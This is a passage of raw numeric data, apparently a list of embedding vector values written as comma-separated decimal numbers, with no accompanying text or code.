-0.014571116305887699, -0.03739973157644272, 0.0005301508354023099, 0.012731652706861496, -0.03666073456406593, -0.0033616384025663137, -0.008265533484518528, 0.037913817912340164, 0.03964885696768761, 0.0003624705714173615, -0.037367600947618484, -0.016627458855509758, -0.016008948907256126, 0.021350620314478874, -0.018105454742908478, 0.031118249520659447, -0.015575189143419266, -0.013149348087608814, -0.03691777586936951, 0.011293820105493069, -0.028274713084101677, 0.014145388267934322, 0.0012209535343572497, -0.018876584246754646, -0.023985309526324272, -0.047424402087926865, 0.05099087208509445, -0.014691604301333427, 0.021350620314478874, 0.0050203679129481316, -0.026636064052581787, -0.010586951859295368, 0.0237764623016119, -0.03929542377591133, 0.02136668562889099, 0.004574559163302183, 0.03881346806883812, 0.0019479027250781655, 0.0024117848370224237, 0.028612080961465836, -0.014450627379119396, -0.0014207641361281276, 0.00027411209885030985, 0.007755464408546686, -0.005092661362141371, -0.012233632616698742, -0.0002625652414280921, 0.014185551553964615, 0.03592173755168915, 0.014185551553964615, 0.020418841391801834, 0.024852829053997993, -0.015591254457831383, 0.020788339897990227, 0.012972630560398102, 0.021141773089766502, 0.020033275708556175, 0.011358080431818962, -0.006349761504679918, 0.023744331672787666, -0.01722186990082264, -0.013326064683496952, 0.03678925707936287, 0.007594812661409378, 0.009165183641016483, 0.027471452951431274, 0.003871707711368799, 0.014964712783694267, 0.0009448332712054253, -0.01194445975124836, 0.01858741044998169, 0.011783807538449764, -0.003707039635628462, 0.001150668365880847, -0.005217166151851416, 0.004482184536755085, -0.029094036668539047, 0.01420964952558279, 0.007743415422737598, -0.047970619052648544, 0.01913362555205822, 0.012956565245985985, 0.000043237920181127265, -0.023198116570711136, -0.005217166151851416, -0.014723734930157661, -0.04022720456123352, 0.00013191017205826938, -0.027632106095552444, 0.011197428219020367, -0.009430259466171265, 0.025864936411380768, -0.05475012585520744, 0.0033475812524557114, 0.057095639407634735, -0.02557576261460781, 0.008116930723190308, 0.01710941456258297, 0.038620688021183014, 0.01722186990082264, -0.03711055964231491, 0.01306098885834217, 0.013655400834977627, 0.0021306441631168127, 0.044468410313129425, -0.03176085650920868, 0.021141773089766502, -0.017302196472883224, 0.01268345769494772, -0.024081701412796974, -0.05198691412806511, -0.001452894532121718, -0.014747832901775837, -0.014097193256020546, 0.01651500165462494, 0.05603533983230591, 0.02016179822385311, -0.0002454959903843701, -0.002204945543780923, -0.033544089645147324, -0.022378792986273766, 0.025672152638435364, -0.01636238396167755, -0.03460439294576645, -0.0001007838873192668, -0.009799757972359657, 0.018940843641757965, 0.012426414526998997, 0.04302254691720009, -0.024997416883707047, -0.016916632652282715, 0.006486315280199051, -0.00627345172688365, -0.012779848650097847, -0.035825345665216446, -0.01688450202345848, 0.006112799979746342, 0.023808592930436134, 0.004301451146602631, -0.004245223011821508, -0.03205002844333649, 0.002739112824201584, -0.027262605726718903, -0.032274942845106125, -0.04636410251259804, 0.01995295099914074, -0.028226517140865326, -0.012795913964509964, -0.0028455446008592844, 0.024467265233397484, -0.00031703623244538903, -0.02045097015798092, -0.03335130959749222, 0.03437947854399681, -0.0035985996946692467, -0.000858984945807606, -0.06188306212425232, -0.017527109012007713, 0.032387398183345795, -0.013149348087608814, -0.008128980174660683, -0.007775546051561832, 0.010731538757681847, 0.024451199918985367, 0.021768314763903618, 0.018940843641757965, -0.040419984608888626, -0.012137241661548615, 0.020756209269165993, 0.05034826695919037, -0.022121749818325043, 0.000943829189054668, 0.0005703137721866369, 0.009944344870746136, 0.04575362429022789, 0.015687646344304085, -0.0002187625359511003, 0.01699695736169815, -0.024499395862221718, 0.009454356506466866, 0.007699236273765564, 0.020290318876504898, -0.07704859226942062, -0.006498364266008139, 0.007072694133967161, -0.01443456206470728, 0.017093349248170853, -0.024836763739585876, -0.0035002005752176046, -0.023647941648960114, -0.03148774802684784, -0.07248608022928238, 0.013711628504097462, -0.029142232611775398, 0.006871879566460848, -0.021061448380351067, 0.01393654104322195, -0.015663547441363335, 0.031294964253902435, 0.003154799109324813, 0.009414194151759148, 0.018507083877921104, 0.01298066321760416, 0.027696365490555763, -0.013406390324234962, -0.018715931102633476, -0.027150150388479233, 0.018298236653208733, 0.032001834362745285, 0.0005898932577110827, -0.02705375850200653, -0.04488610476255417, 0.03017040342092514, 0.00102114281617105, -0.049930572509765625, 0.00953468307852745, -0.0015894485404714942, -0.011775774881243706, 0.0053537203930318356, 0.011221526190638542, -0.011582992970943451, 0.025607893243432045, -0.05005909129977226, 0.046331971883773804, 0.01847495324909687, -0.002192896790802479, -0.005068563390523195, 0.031198574230074883, -0.006349761504679918, 0.0005898932577110827, 0.020290318876504898, 0.007490389049053192, 0.018121520057320595, 0.016145503148436546, 0.038170862942934036, 0.04279763251543045, 0.038556426763534546, 0.0035463878884911537, 0.010450397618114948, -0.014498822391033173, 0.011759709566831589, 0.03425095975399017, 0.013743759132921696, -0.04803488031029701, -0.000004204558081255527, -0.018346432596445084, 0.0017501002876088023, 0.02748751826584339, -0.0056870728731155396, 0.04379367455840111, -0.03717482089996338, -0.03151987865567207, 0.005413964856415987, 0.017832346260547638, -0.01988868974149227, 0.016980892047286034, -0.024113832041621208, -0.0014980777632445097, -0.02186470665037632, 0.010699408128857613, 0.019037235528230667, -0.02300533466041088, 0.035664692521095276, 0.004731194581836462, -0.02584887109696865, -0.005863789934664965, -0.03017040342092514, -0.024884959682822227, -0.016145503148436546, 0.020740143954753876, 0.015374374575912952, 0.007132938597351313, 0.006895977538079023, -0.05401112511754036, -0.002100521931424737, 0.012643294408917427, -0.01858741044998169, 0.009855986572802067, 0.023246312513947487, 0.010988580994307995, 0.01842675916850567, 0.00708072679117322, 0.017719890922307968, -0.022426987066864967, -0.018009064719080925, -0.008514543995261192, 0.0203867107629776, -0.0217040553689003, -0.02220207452774048, 0.012297892943024635, -0.009727464988827705, 0.0004631289339158684, 0.03688564896583557, 0.025672152638435364, -0.009751562960445881, 0.014498822391033173, 0.017511043697595596, 0.0183624979108572, -0.017784152179956436, 0.03000975213944912, 0.015358309261500835, -0.037142690271139145, -0.027808822691440582, -0.00310258730314672, -0.004867748823016882, -0.009590910747647285, -0.02257157489657402, 0.03608238697052002, -0.010153192095458508, -0.03502208739519119, 0.017784152179956436, 0.013141315430402756, 0.04546445235610008, -0.0019207927398383617, -0.018989039584994316, -0.008165126666426659, -0.000599933962803334, 0.012707555666565895, -0.020563427358865738, 0.035182736814022064, 0.0075707146897912025, -0.016418611630797386, 0.014008834958076477, 0.016579262912273407, 0.0010572895407676697, 0.05356130003929138, 0.0004628779133781791, -0.034572262316942215, 0.010016637854278088, -0.014932582154870033, 0.016346318647265434, 0.012948532588779926, 0.01000057253986597, -0.011494634672999382, -0.03412243723869324, -0.0017731939442455769, -0.023856788873672485, -0.0006943168700672686, 0.014635376632213593, 0.042765501886606216, -0.00415284838527441, -0.01543863583356142, -0.009213379584252834, -0.010337941348552704, 0.04196224361658096, -0.013189510442316532, 0.003331516170874238, -0.00342991529032588, -0.007458258420228958, 0.007157036568969488, -0.02421022206544876, -0.006606804206967354, 0.018940843641757965, 0.0015041022561490536, 0.04093407094478607, -0.01979229785501957, 0.017398586496710777, 0.025125937536358833, -0.002789316466078162, 0.0025021512992680073, -0.01219346933066845, 0.0024499394930899143, 0.03055596724152565, -0.027246540412306786, -0.03221068158745766, -0.010289746336638927, -0.006912042386829853, 0.014627343975007534, -0.011928394436836243, 0.013663433492183685, 0.015591254457831383, -0.0020643752068281174, -0.03335130959749222, 0.019374603405594826, 0.02564002387225628, -0.01749497838318348, 0.02208961918950081, -0.018555279821157455, 0.015045038424432278, 0.002100521931424737, -0.02716621570289135, 0.010683342814445496, -0.010554821230471134, 0.02045097015798092, 0.013583107851445675, -0.010948418639600277, -0.01683630608022213, -0.023808592930436134, 0.0011014686897397041, 0.0005532445502467453, -0.006197142414748669, 0.02864421159029007, 0.021945033222436905, 0.026989497244358063, -0.009390096180140972, 0.008128980174660683, 0.025945261120796204, 0.015045038424432278, 0.012956565245985985, 0.015543059445917606, 0.00649033160880208, 0.027342932298779488, -0.014547018334269524, -0.012659359723329544, 0.014707669615745544, -0.016057144850492477, -0.010329908691346645, -0.006213207263499498, 0.0005080612609162927, -0.008490446023643017, -0.007703252602368593, -0.01109300460666418, 0.017623499035835266, 0.006369842682033777, -0.01831430196762085, 0.031230704858899117, -0.005269378423690796, 0.0004922470543533564, 0.034411609172821045, -0.006357794161885977, -0.038684945553541183, -0.029768774285912514, 0.011245624162256718, 0.007032531313598156, -0.03012220747768879, -0.022587640210986137, 0.0007555653573945165, 0.04495036602020264, -0.014249812811613083, -0.0036909745540469885, 0.03515060991048813, -0.007594812661409378, -0.008819782175123692, 0.0489666610956192, -0.034572262316942215, 0.020290318876504898, -0.018940843641757965, 0.02115783840417862, 0.01328590139746666, -0.014763898216187954, -0.006450168788433075, 0.019390668720006943, -0.011687416583299637, 0.008538641966879368, -0.007398014422506094, 0.011084972880780697, 0.03098972700536251, 0.008418153040111065, -0.013221641071140766, 0.010153192095458508, 0.00940616149455309, -0.00983992125838995, 0.002045297995209694, -0.005843708291649818, -0.06522461771965027, -0.0018073325045406818, 0.02629869617521763, 0.006128865294158459, 0.004895862657576799, 0.014691604301333427, -0.04022720456123352, -0.019695907831192017, -0.0076389918103814125, -0.014490789733827114, 0.046331971883773804, -0.023792527616024017, -0.013020826503634453, 0.008843880146741867, 0.0008328790427185595, 0.01760743372142315, 0.03166446462273598, -0.0076751383021473885, 0.01788054220378399, -0.034026045352220535, 0.014322105795145035, -0.009615008719265461, -0.009960410185158253, -0.0030865222215652466, 0.06631705164909363, 0.014466692693531513, -0.022700095549225807, -0.0027873083017766476, 0.00393596850335598, -0.0004033865698147565, -0.0054581440053880215, 0.001974008744582534, 0.024065636098384857, -0.01624189503490925, -0.03225887566804886, 0.010811864398419857, 0.009004532359540462, 0.042829763144254684, -0.015406505204737186, -0.005084628704935312, -0.026250500231981277, -0.005321590229868889, -0.009341900236904621, 0.03148774802684784, 0.0025483388453722, -0.0449182353913784, -0.01347065158188343, -0.024451199918985367, 0.02345515973865986, -0.012450512498617172, -0.01196855679154396, -0.0009101927280426025, 0.02568821795284748, 0.016498936340212822, -0.02568821795284748, 0.021800445392727852, 0.009052727371454239, -0.003223076229915023, -0.005241264123469591, -0.012313958257436752, 0.010739571414887905, 0.02837110310792923, -0.0038456018082797527, -0.009679269045591354, 0.01945492997765541, -0.019326409325003624, 0.030041880905628204, -0.03707842901349068, -0.006590738892555237, 0.008594869635999203, 0.013591140508651733, 0.0018746054265648127, 0.009237476624548435, 0.00035393593134358525, -0.016498936340212822, -0.016772044822573662, 0.007309655658900738, -0.014241780154407024, 0.026362955570220947, -0.015494863502681255, 0.043054673820734024, 0.0036568359937518835, -0.005160938017070293, 0.008197256363928318, -0.029913360252976418, -0.04919157177209854, 0.012370186857879162, -0.025736413896083832, -0.02104538306593895, -0.016137471422553062, -0.00904469471424818, -0.018330367282032967, -0.00511274253949523, 0.0017681735334917903, -0.03508634865283966, 0.01622582972049713, 0.012386252172291279, -0.013261804357171059, 0.029768774285912514, 0.023519419133663177, 0.0135590098798275, 0.004494233522564173, 0.0022109700366854668, -0.003464053850620985, -0.0031327095348387957, 0.0067072114907205105, 0.006100750993937254, 0.019037235528230667, 0.0012601123889908195, -0.003791381837800145, -0.025382980704307556, 0.015872394666075706, 0.009952377527952194, -0.0038616671226918697, 0.008321762084960938, 0.014040964655578136, 0.013960639014840126, -0.006237305235117674, 0.01585632935166359, -0.003180905245244503, -0.03601812943816185, -0.0035704856272786856, -0.017511043697595596, 0.029335014522075653, -0.023744331672787666, 0.015567156486213207, -0.026362955570220947, -0.010651212185621262, 0.01760743372142315, 0.005510355811566114, 0.02470824308693409, 0.033479828387498856, 0.012482643127441406, 0.025318719446659088, -0.01995295099914074, 0.017478913068771362, -0.03187331184744835, 0.008851912803947926, 0.008145044557750225, -0.03585747629404068, 0.013534911908209324, 0.028081929311156273, -0.033704742789268494, -0.01062711514532566, -0.04546445235610008, -0.024338744580745697, 0.011550862342119217, 0.002048310125246644, -0.020675882697105408, -0.0489666610956192, 0.010185322724282742, 0.013534911908209324, -0.006602787878364325, 0.011815938167273998, -0.02234666235744953, -0.0018334384076297283, -0.0075707146897912025, 0.01093235332518816, 0.01731826178729534, -0.028901254758238792, -0.025607893243432045, 0.06008376181125641, -0.012338056229054928, 0.043375980108976364, 0.007659073453396559, -0.013430488295853138, -0.004847667180001736, 0.01592862419784069, -0.004827586002647877, -0.023471225053071976, 0.031455617398023605, -0.007687187287956476, 0.009687301702797413, -0.017784152179956436, -0.004381777253001928, -0.0209971871227026, 0.013494748622179031, 0.011494634672999382, 0.01451488770544529, -0.011928394436836243, -0.0011255665449425578, 0.03630730137228966, 0.023680072277784348, 0.0047552925534546375, 0.026057718321681023, 0.01136611308902502, 0.023904984816908836, -0.01260313205420971, 0.03230707347393036, 0.03230707347393036, -0.030861206352710724, 0.01731826178729534, -0.004803488031029701, -0.004082563333213329, 0.00342991529032588, 0.017623499035835266, -0.007526535540819168, 0.011904296465218067, 0.038170862942934036, 0.005747317336499691, 0.0038114632479846478, 0.015366341918706894, -0.009711399674415588, -0.006506396923214197, -0.008876010775566101, -0.033319178968667984, 0.02127029560506344, -0.017784152179956436, -0.010434332303702831, -0.03688564896583557, -0.004080554936081171, -0.009221412241458893, 0.0009167192038148642, -0.03444373980164528, -0.002329450799152255, 0.010892190039157867, 0.0027411209885030985, 0.005032416898757219, 0.020483100786805153, -0.010739571414887905, 0.027648169547319412, 0.004217109177261591, -0.028114059939980507, 0.004385793581604958, 0.004687015432864428, -0.013840150088071823, -0.00825750082731247, 0.027407193556427956, 0.02967238239943981, 0.00962304137647152, -0.01990475505590439, 0.017800217494368553, -0.012121176347136497, 0.0325319841504097, -0.042765501886606216, 0.0009834900265559554, -0.020306384190917015, -0.030588097870349884, 0.011141200549900532, -0.0024599803145974874, -0.03338344022631645, -0.014924549497663975, -0.017896607518196106, 0.01202478539198637, -0.009831888601183891, -0.009550748392939568, -0.02666819468140602, -0.028724538162350655, 0.0044741518795490265, -0.02027425356209278, -0.017687760293483734, 0.03256411477923393, -0.046267710626125336, -0.01688450202345848, 0.005538470111787319, -0.009052727371454239, -0.03595386818051338, -0.0014659474836662412, 0.011703481897711754, 0.019503125920891762, -0.01929427869617939, 0.033640481531620026, 0.013181477785110474, -0.0032150435727089643, -0.03749612346291542, -0.01706121861934662, 0.015502896159887314, 0.013326064683496952, 0.010177290067076683, 0.007185150403529406, -0.01320557575672865, 0.004915944300591946, 0.024724308401346207, 0.030813010409474373, 0.01781628094613552, 0.0033054102677851915, 0.007233346346765757, -0.005514372140169144, 0.006944173015654087, -0.010289746336638927, -0.01581616699695587, -0.021575532853603363, 0.02011360228061676, -0.000769622391089797, 0.003407825715839863, 0.027969473972916603, 0.03977737948298454, -0.022507313638925552, -0.006863846909254789, -0.0115347970277071, 0.02973664365708828, -0.0029780822806060314, -0.004417923744767904, 0.014924549497663975, 0.02329450659453869, -0.016298122704029083, -0.009807790629565716, 0.012972630560398102, -0.001686843577772379, -0.006309598218649626, -0.014281942509114742, 0.022443052381277084, -0.01722186990082264, -0.03415456786751747, -0.0038978136144578457, -0.027423257008194923, 0.01085202768445015, 0.032274942845106125, 0.0005371793522499502, 0.02639508619904518, -0.000687790394295007, -0.011197428219020367, -0.00931780319660902, -0.02491709031164646, 0.009189281612634659, 0.003821504069492221, -0.02750358358025551, -0.020402776077389717, 0.006165011785924435, -0.020290318876504898, -0.006948189344257116, 0.04148028790950775, 0.03727121278643608, -0.011872165836393833, -0.00298611493781209, -0.003911870531737804, -0.012916402891278267, -0.004450054373592138, 0.0367249958217144, -0.02432267926633358, -0.012956565245985985, -0.009904181584715843, 0.020049341022968292, 0.00019089948909822851, 0.027037693187594414, -0.011695449240505695, -0.018828388303518295, 0.00953468307852745, -0.015647482126951218, -0.024451199918985367, 0.016466807574033737, -0.026748521253466606, 0.010064833797514439, 0.000930274196434766, 0.010570886544883251, -0.03556830435991287, -0.02923862263560295, -0.02880486287176609, -0.008546674624085426, 0.019856559112668037, 0.003008204512298107, 0.02443513460457325, -0.018844453617930412, -0.014828158542513847, -0.0009543719352222979, -0.021832576021552086, -0.029833033680915833, 0.009671236388385296, 0.010153192095458508, 0.007715301588177681, -0.0515049584209919, 0.01727006584405899, 0.00802053976804018, 0.058412984013557434, -0.022812552750110626, 0.0020442937966436148, -0.015237820334732533, -0.03376900404691696, -0.031455617398023605, 0.03066842444241047, -0.011277754791080952, -0.015334212221205235, 0.0313110314309597, 0.020627688616514206, 0.02006540633738041, -0.005558551289141178, 0.027953408658504486, 0.04029146581888199, 0.0025162084493786097, 0.023310571908950806, -0.017254000529646873, -0.010177290067076683, -0.002606575144454837, 0.0217040553689003, -0.004940042272210121, -0.010988580994307995, -0.005887887440621853, -0.000518101966008544, -0.01781628094613552, 0.025399046018719673, -0.002024212386459112, -0.01539043989032507, 0.02984909899532795, -0.008635032922029495, -0.009582878090441227, 0.02694130316376686, 0.02234666235744953, 0.004381777253001928, -0.010900222696363926, 0.029833033680915833, -0.017591368407011032, -0.0013243730645626783, -0.017960868775844574, 0.0018545238999649882, -0.0325319841504097, -0.021238164976239204, 0.025543631985783577, 0.019647711887955666, 0.010321876034140587, -0.022153880447149277, 0.03071661852300167, -0.0005572608206421137, -0.015286016277968884, -0.0237764623016119, -0.0001748343202052638, 0.007542600855231285, -0.0115347970277071, -0.005482241977006197, 0.007879969663918018, 0.03482930362224579, 0.000631060276646167, -0.001499081845395267, -0.026909172534942627, 0.002006139140576124, -0.009165183641016483, 0.004787422716617584, 0.012554936110973358, -0.0006320643005892634, -0.0012470594374462962, -0.009068792685866356, -0.007699236273765564, -0.03182511776685715, -0.002017183927819133, 0.013044924475252628, 0.017864476889371872, 0.030138272792100906, 0.018507083877921104, 0.01683630608022213, -0.017864476889371872, 0.016579262912273407, -0.005819610320031643, -0.0035363470669835806, 0.0023696136195212603, 0.03701416775584221, -0.01065924484282732, 0.01219346933066845, -0.010458430275321007, 0.01579206995666027, -0.011936427094042301, 0.046428363770246506, 0.03206609562039375, -0.006008376367390156, -0.010096964426338673, 0.010482528246939182, -0.018731996417045593, -0.023165985941886902, -0.025399046018719673, -0.024788569658994675, -0.006783521268516779, -0.006811635103076696, 0.00869126059114933, 0.0025784610770642757, 0.004867748823016882, 0.012723620980978012, 0.04234780743718147, -0.0007349818479269743, -0.003004188183695078, -0.005000286269932985, 0.0064059896394610405, -0.0029680414590984583, 0.02345515973865986, -0.01241034921258688, 0.02421022206544876, -0.0258006751537323, -0.0034680701792240143, -0.01368753146380186, -0.0037953981664031744, -0.003775316756218672, 0.015759939327836037, -0.01569567807018757, 0.021334555000066757, -0.013261804357171059, 0.009012564085423946, 0.03158413991332054, -0.02732686698436737, 0.033094264566898346, 0.005554534960538149, 0.024515461176633835, 0.00531355757266283, 0.021238164976239204, -0.007052612956613302, 0.009815823286771774, 0.02120603434741497, 0.004940042272210121, 0.008771587163209915, 0.00997647549957037, 0.008707325905561447, -0.01565551571547985, -0.012273795902729034, -0.010763668455183506, 0.032226745039224625, -0.033865392208099365, -0.028355037793517113, -0.004229158163070679, 0.005650926381349564, 0.01624189503490925, 0.012121176347136497, -0.02049916610121727, -0.04022720456123352, -0.00931780319660902, -0.0009834900265559554, 0.03958459571003914, -0.005859773606061935, -0.01847495324909687, 0.007550633512437344, -0.008084800094366074, 0.025286588817834854, -0.011213493533432484, -0.0003366156597621739, -0.005779447499662638, -0.009735497646033764, 0.015125364996492863, 0.017254000529646873, 0.01874806173145771, 0.0073056393302977085, -0.00926960725337267, 0.032499853521585464, 0.007116873748600483, 0.0010683343280106783, 0.00794021412730217, -0.042990416288375854, 0.013920476660132408, 0.01172757986932993, 0.013631302863359451, -0.016025014221668243, -0.008635032922029495, 0.00539789954200387, -0.011823970824480057, 0.005345687735825777, -0.0029881231021136045, -0.005213150288909674, 0.0001457161852158606, -0.0028294792864471674, -0.003891789121553302, 0.018844453617930412, 0.010402202606201172, -0.018780192360281944, 0.00291783781722188, -0.029383208602666855, -0.0037994144950062037, -0.027519648894667625, -0.015045038424432278, -0.004594640806317329, -0.006952205672860146, -0.0006852802471257746, -0.00048120226711034775, 0.01571977697312832, -0.021848641335964203, 0.02400137484073639, -0.019326409325003624, -0.004313500132411718, 0.026475412771105766, -0.0019479027250781655, -0.015567156486213207, -0.0017792184371501207, 0.013382292352616787, 0.04543232172727585, -0.014892419800162315, -0.007426128257066011, 0.024194156751036644, 0.022057488560676575, 0.03225887566804886, 0.011189396493136883, 0.013679498806595802, 0.009438292123377323, -0.002542314352467656, 0.0008860949310474098, -0.003291353117674589, -0.021077513694763184, -0.008024556562304497, -0.005743301007896662, -0.007193183060735464, -0.0016677662497386336, 0.004058465361595154, -0.00642205448821187, -0.014040964655578136, 0.003705031471326947, -0.02968844771385193, 0.05214756727218628, -0.010651212185621262, -0.009157150983810425, -0.01738252118229866, -0.019342472776770592, 0.020306384190917015, 0.003291353117674589, 0.0026146075688302517, 0.019085431471467018, 0.008141028694808483, 0.02623443491756916, -0.005899936426430941, 0.013052956201136112, -0.010763668455183506, 0.0024981352034956217, -0.008940271101891994, -0.020322449505329132, 0.006309598218649626, -0.009944344870746136, 0.008843880146741867, 0.029061906039714813, 0.004787422716617584, -0.026957368478178978, 0.02837110310792923, -0.002524241106584668, 0.041126854717731476, -0.0019087438704445958, -0.013655400834977627, 0.007550633512437344, 0.0048757814802229404, -0.0170451533049345, -0.003180905245244503, -0.0024037521798163652, -0.008835847489535809, 0.011309884488582611, -0.019278213381767273, 0.01842675916850567, 0.021302424371242523, 0.022282401099801064, 0.01853921450674534, 0.012081013061106205, -0.0016175626078620553, 0.0032029948197305202, -0.038620688021183014, 0.0020864650141447783, -0.024676112458109856, -0.012362154200673103, -0.004317516461014748, -0.029399273917078972, -0.018491018563508987, 0.011558894999325275, 0.02776062674820423, -0.004446038044989109, 0.025768544524908066, -0.021189969033002853, -0.029608121141791344, -0.02115783840417862, 0.006526478100568056, -0.02552756667137146, -0.005815594457089901, 0.042926155030727386, -0.029993686825037003, 0.0040705143474042416, -0.017093349248170853, -0.026764584705233574, 0.0018434791127219796, 0.016707785427570343, 0.024965286254882812, 0.02054736204445362, -0.0017109414329752326, -0.048356182873249054, 0.010233517736196518, 0.006542543414980173, -0.015486830845475197, 0.01150266733020544, -0.02967238239943981, -0.012868206948041916, -0.008289631456136703, 0.0027632105629891157, 0.004317516461014748, 0.02716621570289135, -0.025286588817834854, -0.014530953019857407, -0.003779333084821701, -0.00042145990300923586, 0.010458430275321007, 0.00962304137647152, -0.022764356806874275, 0.015824200585484505, -0.0025704284198582172, 0.010530724190175533, -0.006209190934896469, -0.02657180279493332, 0.01935853809118271, -0.01101267896592617, -0.0017972916830331087, -0.009012564085423946, -0.01486832182854414, 0.015358309261500835, 0.01731826178729534, 0.003088530385866761, 0.012779848650097847, 0.00024323682009708136, -0.02355154976248741, 0.018458887934684753, 0.02072407864034176, -0.020145732909440994, 0.010161224752664566, -0.01065924484282732, -0.015205690637230873, 0.016306154429912567, 0.02930288389325142, 0.0001453396544093266, -0.010892190039157867, 0.011197428219020367, -0.005048482213169336, 0.01869986578822136, -0.013101152144372463, -0.014683572575449944, 0.02220207452774048, 0.0014488782035186887, -0.0003448992792982608, -0.007422111928462982, 0.010675310157239437, 0.009189281612634659, 0.0017992998473346233, -0.023985309526324272, 0.016579262912273407, -0.02186470665037632, -0.019085431471467018, 0.006152962800115347, 0.013647368177771568, -0.001403694855980575, 0.008787652477622032, 0.005377818364650011, -0.009197314269840717, -0.02750358358025551, -0.013438520953059196, 0.009430259466171265, -0.006594755221158266, -0.02017786353826523, 0.018137585371732712, 0.0024840780533850193, -0.010305811651051044, -0.019776232540607452, 0.016282057389616966, -0.03383326530456543, -0.00248006172478199, -0.027021627873182297, -0.004518331028521061, -0.010755636729300022, 0.0009488495416007936, 0.00912502035498619, -0.004735210910439491, -0.009157150983810425, 0.02650754339993, 0.011181363835930824, -0.02996155619621277, -0.020290318876504898, -0.0076550571247935295, 0.011141200549900532, 0.03147168084979057, -0.015623385086655617, 0.011639220640063286, -0.03376900404691696, 0.01306902151554823, -0.02464398182928562, 0.04527166858315468, -0.006992368493229151, 0.017752021551132202, -0.0034479887690395117, 0.031005792319774628, -0.015446668490767479, 0.025864936411380768, 0.04131963476538658, -0.016852371394634247, 0.010892190039157867, 0.00136654416564852, 0.03328704833984375, -0.012715588323771954, -0.005016351584345102, -0.012338056229054928, -0.005638877395540476, -0.003797406330704689, -0.0024539558216929436, 0.0051408568397164345, -0.00844225101172924, 0.005859773606061935, -0.008876010775566101, 0.003152791177853942, -0.006265419069677591, -0.011783807538449764, -0.002923862310126424, 0.010233517736196518, -0.013366227969527245, -0.024531526491045952, 0.011494634672999382, 0.004767341539263725, 0.014844223856925964, -0.01363933552056551, -0.05034826695919037, -0.015141429379582405, 0.00001790074929886032, 0.00852257665246725, -0.005747317336499691, -0.0048436508513987064, -0.011165298521518707, 0.018571345135569572, 0.004289402160793543, -0.019503125920891762, -0.005285443272441626, 0.006253370083868504, -0.005438062362372875, -0.003670893143862486, -0.016330253332853317, -0.00524929678067565, -0.04585001617670059, 0.033415570855140686, -0.0035343391355127096, 0.018442824482917786, -0.013406390324234962, 0.004723162390291691, 0.027118019759655, 0.010321876034140587, -0.014008834958076477, -0.04379367455840111, -0.031198574230074883, 0.027953408658504486, 0.01678811013698578, 0.004056457430124283, -0.013237706385552883, 0.004040392115712166, 0.015109299682080746, 0.0044380053877830505, -0.00342991529032588, 0.010908255353569984, 0.042990416288375854, -0.00222101085819304, 0.006257386412471533, -0.008546674624085426, -0.004956107120960951, 0.02154340222477913, -0.0020965056028217077, 0.0145952133461833, 0.004353662952780724, 0.013623270206153393, -0.014659474603831768, 0.010835962370038033, -0.013125250115990639, -0.0039038381073623896, -0.021077513694763184, -0.03434734791517258, 0.0022370759397745132, 0.009815823286771774, 0.009928279556334019, -0.0030624244827777147, -0.008410120382905006, -0.008249468170106411, -0.006763439625501633, 0.01781628094613552, -0.014024900272488594, 0.010884157381951809, 0.0026607951149344444, -0.02033851481974125, 0.016282057389616966, -0.012779848650097847, -0.009526650421321392, 0.0004899878986179829, -0.014796028845012188, -0.008723391219973564, -0.008546674624085426, 0.00025980404461733997, -0.006960238330066204, -0.0014478741213679314, -0.003648803336545825, -0.021623728796839714, 0.014779963530600071, 0.005634861066937447, 0.01869986578822136, 0.003843593643978238, 0.030748749151825905, -0.008900108747184277, -0.005277410615235567, -0.02628263086080551, 0.010040735825896263, -0.013575075194239616, 0.01961558125913143, 0.013157380744814873, 0.015326179563999176, -0.008699293248355389, -0.001252079731784761, -0.008104882203042507, -0.014016867615282536, -0.022105684503912926, -0.00539789954200387, -0.01290033757686615, -0.015334212221205235, 0.004132766742259264, 0.018185781314969063, 0.015020940452814102, 0.027182281017303467, -0.026443282142281532, 0.00554650230333209, -0.0033515975810587406, -0.018731996417045593, -0.001933845691382885, -0.003915886860340834, 0.012394284829497337, -0.006494347937405109, -0.0025523551739752293, 0.013599172234535217, -0.007916116155683994, -0.019005104899406433, -0.007381949108093977, -0.005482241977006197, 0.022892877459526062, -0.015101267024874687, 0.01825004070997238, -0.024997416883707047, 0.018121520057320595, -0.024290548637509346, -0.02750358358025551, -0.029865164309740067, 0.014916516840457916, 0.009301737882196903, 0.011976589448750019, 0.01706121861934662, -0.010289746336638927, 0.00400424562394619, 0.0011084972647950053, 0.015141429379582405, -0.003026277758181095, 0.007606861647218466, 0.008241436444222927, -0.005148889496922493, 0.022282401099801064, 0.004699064418673515, -0.02454759180545807, 0.004257271997630596, 0.010860060341656208, 0.015800101682543755, 0.004313500132411718, 0.02252337895333767, -0.0006702191312797368, 0.013727693818509579, 0.02088472992181778, 0.02853175438940525, 0.019005104899406433, -0.009735497646033764, -0.023647941648960114, -0.0038616671226918697, -0.017286131158471107, 0.001005077618174255, 0.004751276224851608, -0.007968327961862087, -0.016964826732873917, 0.01567961275577545, 0.014450627379119396, -0.016643524169921875, -0.017864476889371872, 0.0007560673984698951, 0.02520626410841942, 0.012209534645080566, 0.00401026988402009, 0.018394628539681435, 0.008434218354523182, 0.001406707102432847, -0.006478282622992992, -0.014940614812076092, 0.008369957096874714, -0.0008293648133985698, -0.0036387627478688955, -0.01754317432641983, -0.0005773422890342772, 0.002795340958982706, -0.012040850706398487, -0.0058075617998838425, -0.007177118211984634, -0.017671694979071617, 0.00992024689912796, -0.009092890657484531, 0.012121176347136497, 0.03229100629687309, 0.002594526158645749, -0.000009687741112429649, -0.009647139348089695, 0.010201388038694859, -0.0156073197722435, -0.0050364332273602486, -0.0045906244777143, 0.024579720571637154, 0.001128578674979508, -0.023214181885123253, -0.01136611308902502, -0.007683170959353447, -0.02125423029065132, 0.008932238444685936, 0.016627458855509758, 0.003223076229915023, -0.01847495324909687, 0.0012330024037510157, 0.013816053047776222, -0.027246540412306786, -0.007084743119776249, 0.0034961842466145754, -0.024692177772521973, -0.006695162504911423, -0.00222101085819304, 0.009799757972359657, -0.01429800782352686, 0.013735726475715637, -0.037913817912340164, -0.00402031047269702, 0.006096734665334225, 0.012000687420368195, 0.0002526500029489398, -0.007739399094134569, -0.024129897356033325, 0.023326637223362923, -0.01123759150505066, -0.000812797574326396, 0.016547132283449173, 0.02295713871717453, -0.018731996417045593, 0.002140684984624386, 0.013607204891741276, 0.00008817021443974227, 0.01385621540248394, -0.007442193571478128, -0.0018454872770234942, 0.024354809895157814, -0.01620173081755638, 0.028547819703817368, -0.013799987733364105, -0.031294964253902435, -0.006032474339008331, -0.02739112824201584, 0.023310571908950806, 0.0015874403761699796, -0.022555509582161903, 